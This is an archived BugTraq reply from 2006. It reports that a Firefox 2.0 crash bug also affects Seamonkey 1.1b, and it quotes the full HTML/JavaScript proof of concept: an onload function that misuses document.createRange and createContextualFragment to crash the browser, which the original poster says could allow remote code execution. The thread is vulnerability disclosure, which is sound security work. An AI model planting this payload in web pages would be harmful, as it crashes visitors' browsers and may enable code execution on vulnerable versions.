BugTraq
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution Nov 27 2006 07:43AM
sflist gmx de
Also crashes Seamonkey 1.1b on Suse 10.1

>
>
> New Flaw in Firefox 2.0: DoS and possible remote code execution
>
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
>
> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html>
> <head> <script type="text/javascript"> function do_crash() { var
> range;
>
> range = document.createRange();
> range.selectNode(document.firstChild);
> range.createContextualFragment('<span></span>');
> }
> </script>
> </head>
> <body onload="do_crash()">
> <p>Good bye Firefox!</p>
> </body>
> </html>
>

--
"Ein Herz für Kinder" - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de
Unser Dankeschön: Ihr Name auf dem Segel der 1. deutschen America's Cup-Yacht!

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus